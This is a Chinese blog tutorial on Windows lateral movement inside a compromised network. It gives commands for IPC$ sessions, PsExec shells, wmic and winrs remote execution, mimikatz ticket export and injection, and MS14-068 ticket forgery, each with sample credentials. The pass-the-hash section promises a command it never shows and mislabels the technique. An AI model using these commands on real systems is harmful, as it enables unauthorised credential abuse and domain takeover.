内网横向移动思路和技巧

地球胖头鱼 2020-12-01
系统与内网安全 发布于 2020-12-01 09:45:56 阅读 184 评论 0

前言

攻击者借助跳板机进一步入侵内网服务器后,接着会通过各种方式来获取目标系统权限,获取用户的明文密码或Hash值在内网中横向移动。

最简单的方式,就是使用明文密码进行登录远程服务器。在这里,我们来总结一下Windows横向移动的思路与攻击手法。

IPC连接

通过验证用户名和密码建立与目标机器的IPC$会话连接,查看远程主机的共享资源,执行上传/下载,创建计划任务等操作。

net use \\<DCIP>\ipc$ "password" /user:"username"

psexec

PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程,并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。

下载地址:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

返回一个交互Shell:

psexec.exe \\10.1.1.1 -u administrator -p abc123! cmd.exe

同时,Metasploit下也集成了PsExec模块。

WMI

WMI即Windows管理规范 是用户管理本地和远程计算机的一种模型。通过它可以访问、配置、管理和监视几乎所有的 Windows 资源。

远程创建进程:

wmic /node:10.1.1.1 /user:administrator /password:abc123! process call create "cmd.exe /c ipconfig"

WinRm

WinRM指的是Windows远程管理服务,通过远程连接winRM模块可以操作windows命令行,默认监听端口5985(HTTP)&5986 (HTTPS),在2012以后默认开启。

winrs -r:http://10.1.1.1:5985 -u:administrator -p:abc123! "whoami /all"

哈希传递攻击(Pass the key)

获取目标用户的哈希,攻击者就可以使用用户的哈希来来模拟用户,获取用户访问权限。

MSF 提供了psexec模块可以进行Hash传递,只使用密码哈希,来执行任意命令:

票据传递攻击(Pass the ticket)

获取域控权限后,就可以导出域控内存中的Ticket,用来登录域控。

攻击流程如下:

第一步:使用mimikatz导出内存中的ticket

mimikatz# sekurlsa::tickets /export

第二步:挑选一个文件,在普通用户的主机进行导入。

第三步:获取域控权限

MS14-068

MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。前提是需要在域控主机查看是否安装了KB3011780补丁。

攻击流程如下:

第一步:利用MS14-068伪造生成TGT

MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d  dc.test.com

第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书

mimikatz#kerberos::ptc TGT_bypass@test.com.ccache

第三步:获取权限

PsExec.exe \\dc  cmd.exe

总结

这里总结了几种内网横向移动的方法,还有两种我没有说就是最常见的黄金/白银票据这两种方法以及很常见了。我在以前的文章中也介绍过这两种方法这里就不过的介绍了。希望以上者些办法能帮助到你,多多关注。

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
地球胖头鱼
未填写
  • 作者发布文章236
  • 作者收获粉丝9
  • 作者收到点赞2
  • 所有文章被收藏了3
  • 博客总访问量排行第2
  • 博客总访问量6.1 万(每日更新)
查看所有博文